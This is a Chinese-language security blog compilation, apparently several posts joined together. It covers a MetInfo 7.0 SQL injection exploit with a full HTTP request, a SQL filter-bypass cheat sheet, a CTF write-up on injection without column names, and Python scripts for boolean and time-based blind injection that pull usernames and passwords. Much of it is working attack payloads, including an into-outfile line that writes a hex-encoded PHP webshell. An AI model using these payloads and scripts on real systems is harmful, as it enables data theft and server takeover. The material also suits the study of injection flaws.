        $lang_pack_url = PATH_WEB . 'cache/language_web_' . $editor . '.ini';
    }

    foreach ($language_data as $key => $val) {
        file_put_contents($lang_pack_url, $val['name'] . '=' . $val['value'] . PHP_EOL, FILE_APPEND);
    }
}

$appno直接拼接 当site等于web或者admin时造成sql注入

找下有没有调用这个函数传参的

app/system/language/admin/language_general.class.php:90

public function doExportPack()
{
    global $_M;

    if (!isset($_M['form']['editor']) || !$_M['form']['editor']) {
        $this->error($_M['word']['js41']);
    }

    $editor = $_M['form']['editor'];
    $site = isset($_M['form']['site']) ? $_M['form']['site'] : '';
    $appno = $_M['form']['appno'] ? $_M['form']['appno'] : '';
    $filename = PATH_WEB . 'cache/language_' . $site . '_' . $editor . '.ini';

    delfile($filename);

    //获取后台语言包
    $this->doget_admin_pack($appno,$site,$editor);

    $filename = realpath($filename);
    header("");
    Header("Content-type:  application/octet-stream ");
    Header("Accept-Ranges:  bytes ");
    Header("Accept-Length: " . filesize($filename));
    header("Content-Disposition:  attachment;  filename=language_{$site}_" . $appno .'_'. $editor . ".ini");
    //写日志
    $log_name = $_M['form']['site'] ? 'langadmin' : 'langweb';
    logs::addAdminLog($log_name,'language_outputlang_v6','jsok','doExportPack');
    readfile($filename);
}

看下代码，首先要传递参数editor跳出第一个if语句块，然后site和appno直接传入doget_admin_pack()函数，参数都可控，妥妥的注入。

payload

POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1
Host: php.local
Content-Length: 58
Origin: http://php.local/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: XDEBUG_SESSION=PHPSTORM; PHPSESSID=40d2af28a4c309bbb824dc957af59b11; arrlanguage=metinfo; re_url=http%3A%2F%2Fphp.local%2Fadmin%2F; met_auth=65acz4xG7IkP%2BqmPuO%2FIvPsKt4luK6Te34p%2F2BHXEosgKHUwk8dKQRHs7y4Ea9mCH1egudtuz%2Bl02L3eIhMLs7%2FDMw; met_key=PLBqK9J; page_iframe_url=http%3A%2F%2Fphp.local%2Findex.php%3Flang%3Dcn%26pageset%3D1
Connection: close

appno= 1 union SELECT user(),database()&editor=cn&site=web

组合拳

在前文中提到了metinfo6.2.0配合注入getshell的姿势，但是在metinfo7.0中增加了后缀校验，无法getshell，很可惜。

app/system/include/class/web.class.php:757

if (stristr($filename, '.php')) {
    jsoncallback(array('suc' => 0));
}

但是这个点仍然可以上传其他后缀的文件，通过这个点配合解析漏洞或者文件包含来getshell未免不可行。

想到了htaccess和.user.ini的同学别费力气了，写文件没办法换行，如果有师傅有新姿势，欢迎评论指点啊！

总结

metinfo7.0的注入实际上还有很多，不过很多都是delete型的注入，我在这里挑了两个回显的注入，欢迎师傅们补充交流。

CVE-2019-16997
CVE-2019-16996

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

过滤了单引号可以利用以下几种方法绕过。

1. 整数型注入
  整数型注入就不用多废话了，只有在判断表名和列名的时候需要用到单引号，但是可以利用char函数和16进制绕过。利用sql语句写入文件的时候也可以利用16进制，因为mysql会将16进制解析。
2. 字符型注入
  gbk编码，另外可以根据具体的waf/ips规则进行bypass，比如dedecms中的全局过滤ips绕过方式。

过滤select

其实过滤了select基本无解，起码在我这个菜逼眼里是这样的，但是也要考虑特殊情况。比如今年的强网杯的一道题目，虽然过滤了select但是可以堆叠查询，因此有了绕过的方法。

//用到的语句
set语句可用于向系统变量或用户变量赋值。 eg: SET @s1ye=test;
PREPARE stmt_name FROM preparable_stmt 定义预处理语句，它将包含占位符(?)的查询传递给MySQL服务器。
EXECUTE stmt_name  执行预处理语句

过滤逗号

1. 盲注：

   利用from 1 for 1

2. 可回显注入：

   利用 A join B

3. 使用like：

   select user() like ‘r%’;

4. limit时的利用方法在下面limit部分。

A join B:
  INNER JOIN（内连接,或等值连接）：获取两个表中字段匹配关系的记录。
  LEFT JOIN（左连接）：获取左表所有记录，即使右表没有对应匹配的记录。
  RIGHT JOIN（右连接）： 与 LEFT JOIN 相反，用于获取右表所有记录，即使左表没有对应匹配的记录。
  用法就很简单了，我们用的到第一种方法，INNER可以省略，效果一样。
  eg: select a.name,b.password from users a join passwd n;
  在回显注入下使用：
  ?id=-1 union select * from ((select 1)a join (select 2)b join (select 3)c join (select 4)d)

from 1 for 1:
  没啥好说的直接看例子，eg
  ?id=-1 union select 1,2,ascii(substr((database()) from 1 for 1))='r'--+

"like" eg:(tablename=name)
  select * from name where id =1 and (select group_concat(table_name) from information_schema.tables where table_schema=database()) like 'n%';

比较符号绕过

1. between a and b：返回a，b之间的数据，不包含b。
2. greatest()、least()：（前者返回最大值、后者返回最小值）

​ eg: select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

​ 所以上述语句就是与64比较，当页面正常返回时说明真实的ascii码小于或等于64，继续fuzz即可。

等号绕过

可以使用like、rlike、regexp 或者<>。盲注时也可以利用运算符，^、+、-等，观察返回结果与页面变化即可，举一反三灵活运用。

order by 注入

利用oder by盲注的话看文章：

一道题引发的无列名注入

注入点在order by 后的盲注
1. if（条件语句）
  ?order=if((1=1),sleep(3),1)
2. 直接and if
  看图
3. rand()盲注：
  order by rand(true); order by rand(false);

注入点在order by 后的报错注入:
1. 利用procedure存储过程
2. XPATH
   select * from name order by extractvalue(1,concat('~',database(),'~'));

#利用LINES TERMINATED BY方式getshell
   ?order=1 limit 0,1 into outfile '/tmp/2.php' LINES TERMINATED BY 0x3C3F7068702061737365727428245F504F53545B70765D293B3F3E

limit注入

注入点在limit后的注入：
  同样的利用procedure存储过程 （https://www.leavesongs.com/PENETRATION/sql-injections-in-mysql-limit-clause.html）
看文章就可以了

如果注入中需要用到limit但是又过滤了逗号，可以利用以下方法。
select * from users limit 0,1;
# 等价于↓
select * from users limit 1 offset 0;

盲注带外

直接看文章，利用dnslog带外的话需要一些权限，比如必须有FILE权限、secure_file_priv为空而不是NULL（不为空就只能读限定目录的文件）

chabug一位师傅的文章

substr替换

mid,left,right,substring,lpad,rpad等

题目地址 http://152.136.179.79:18084/ 传入id=3为flag的id。

常规联合查询注入

http://152.136.179.79:18084/?id=3 union select 1,2,3

三个字段

http://152.136.179.79:18084/?id=3 union select 1,2,(select table_name from information_schema.tables where table_schema=database())

拿到flag所在的表，继续查列名

http://152.136.179.79:18084/?id=3 union select 1,2,(select column_name from information_schema.columns where table_name='this_1s_th3_fiag_tab13')

死活查不出来，应该是过滤了column关键字，没有列名怎么查出来数据呢？？？

有两种方法
1. order by盲注
2. 子查询

本地测试建表

order by盲注

order by用于根据指定的列对结果集进行排序。一般上是从0-9a-z这样排序，不区分大小写。

先来本地测试一下

可以看到我们构造的数据排在了第一行

仍然在第一行

当拿’q’和’pass’做比较时，我们构造的数据被排在了第二行。由此可以来根据不同的回显来逐位判断。

拿我们这道题来说

1的时候我们的数据在前

2的时候原始数据在前，说明第一位是1

然后判断第二位

1a的时候我们的数据在前

1b的时候原始数据在前，说明第二位是1a

由此逐位判断。

子查询

在无列名的情况下，用子查询可以很简单的将数据跑出来。

子查询是将一个查询语句嵌套在另一个查询语句中。在特定情况下，一个查询语句的条件需要另一个查询语句来获取，内层查询（inner query）语句的查询结果，可以为外层查询（outer query）语句提供查询条件。

这个语句将列名转换为了1,2,3，这个时候列名就已知了，我们可以用子查询将数据归并。

此时就能查出来数据了，然后我们再来看这个题。

我们已知了表名为this_1s_th3_fiag_tab13，但是不知道这个表有几个字段

可以用联合查询的方式来判断字段数。

查出数据

拿到我们这个题里来

payload

http://152.136.179.79:18084/?id=3 union select 1,2,x.2 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from this_1s_th3_fiag_tab13)x

子查询真是个好东西👍

写在文后

本文介绍了两种无列名注入的方式，很巧妙的在没有列名的情况下查出来数据，在实际利用中更推荐用子查询的方式，毕竟盲注有可能费力不讨好。

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

最近忙着写主题模版，写插件，帮朋友做项目安全测试，还有自己学校的期末考试，但是越是期末，与紧张，就越是感觉非常刺激~

对于SQL注入还不理解的朋友可以参看之前的文章《SQL注入基础》,本文章主要讲SQL盲注。

0x00 盲注简介：

顾名思义，像盲人一样注入（什么鬼解释…），通俗来说，当我们发现有SQL注入时，确不能得到SQL查询的数据回显，除了之前的写文件方式，还有就是盲注了，盲注就是通过服务器返回的状态等各种因素来猜测，最终组合得到哦我们想要的数据。

0x01 盲注必须知识：

SQL盲注中常用的几个内置函数，了解一下~

length(str)：返回str字符串的长度。
substr(str, pos, len)：将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的，不是数组的0开始
mid(str,pos,len):跟上面的一样，截取字符串
ascii(str)：返回字符串str的最左面字符的ASCII代码值。
asc();同上
ord(str):同上，返回ascii码
if(a,b,c) :a为条件，a为true，返回b，否则返回c，如if(1>2,1,0),返回0

0x02 基于网页特征的Bool盲注：

这里还是基于Sqli平台吧，这货花样多~

先以最简单的 Less-8 这个单引号Bool盲注的题

分析源码:

<?php
//和原文件有删减，为了更好的阅读效果
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0); //不报错

if(isset($_GET['id']))    //如果有参数id传入
{
$id=$_GET['id'];

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)    //如果查到数据就执行如下
    {
      echo '<font size="5" color="#FFFF00">';    
      echo 'You are in...........';
      echo "<br>";
        echo "</font>";
      }
    else     //否则执行这个     从两者返回的网页结构不一样，就可以作为我们盲注条件判断的依据
    {

    echo '<font size="5" color="#FFFF00">';
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';

    }
}
    else { echo "Please input the ID as parameter with numeric value";}

?>

根据服务器返回的不同网页结构来判断当前的SQL注入的关键词是否正确，一个有 You 单词，可根据这一特征。

构造这样的语句，返回if(true)的网页

不满足，返回if(false)的网页

下面就写一个简单的脚本来具体解释：

# name：SQL bind
# author:DYBOY
# time: 2018-07-01
# description: 用于SQL盲注学习脚本参考

import requests
import re


req = requests.Session()
header = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"}


#盲注测试字符
fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
fuzz = list(fuzz)

main_url = "http://www.test.com/Less-8/index.php?id=1"
#注入参考语句：id=1%27+and+ascii(substr((select+username+from+users+limit+0,1),1,1))=97+%23
#注入参考语句2： id=1%27+and+ascii(substr((select+username+from+users+limit+0,1),1,1))=ascii("a")+%23
username = "username:"
password = "password:"


#得到usernmae
for i in range(1,6):
    for key in fuzz:
        url = main_url + "%27+and+ascii(substr((select+username+from+users+limit+0,1),"+str(i)+",1))="+str(ord(key))+"+%23"
        html = req.get(url,headers = header,timeout=8)
        guize  = r'You'
        if(re.findall(guize,html.text)):
            username = username + key
            print(username)


#得到password    
for j in range(1,6):
    for key in fuzz:
        url = main_url + "%27+and+ascii(substr((select+password+from+users+limit+0,1),"+str(j)+",1))="+str(ord(key))+"+%23"
        html = req.get(url,headers = header,timeout=8)
        guize  = r'You'
        if(re.findall(guize,html.text)):
            password = password + key
            print(password)

运行结果如下：

这个脚本就是基于网页特征来判定的，下面看看时间盲注的脚本怎么写！

0x03 延时注入：
当一个网页返回的数据根本没变化，报错也不管用，时间盲注就可以上线了！

先看一个SQL语句：

if(ascii(substr((select+username+from+users+limit+0,1),1,1))=97,sleep(3),0)

这个SQL语句执行的效果就是，如果if语句成立那么就服务器延时 3s 后返回网页给客户端，否则正常时间返回网页。通过这样一个条件，我们就可以进行时间盲注了。

时间盲注脚本如下：

# name：SQL time bind injection
# author:DYBOY
# time: 2018-07-01
# description: 用于SQL时间盲注学习脚本参考


import requests
import time

req = requests.Session()
header = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"}

#盲注测试字符
fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ@_.<>?/;!$#{}-'
fuzz = list(fuzz)

main_url = "http://www.test.com/Less-8/index.php?id=1"
#注入参考语句：id=1%27+and+if(ascii(substr((select+username+from+users+limit+0,1),1,1))=97,sleep(3),0)+%23

username = "username:"
password = "password:"

#得到username
for i in range(1,6):
    for key in fuzz:
        start_time = time.time()
        url = main_url + "%27+and+if(ascii(substr((select+username+from+users+limit+0,1),"+str(i)+",1))="+str(ord(key))+",sleep(3),0)+%23"
        html = req.get(url,headers = header,timeout=8)
        if((time.time() - start_time)>=3):
            username = username + key
            print(username)


#得到password
for i in range(1,6):
    for key in fuzz:
        start_time = time.time()
        url = main_url + "%27+and+if(ascii(substr((select+password+from+users+limit+0,1),"+str(i)+",1))="+str(ord(key))+",sleep(3),0)+%23"
        html = req.get(url,headers = header,timeout=8)
        if((time.time() - start_time)>=3):
            password = password + key
            print(password)

运行结果：

没错，时间盲注就是将判断条件改成了时间，时间盲注往往有更广泛的用途~

0x04 总结
没错，就是这么简单！欢迎各位来探讨技术~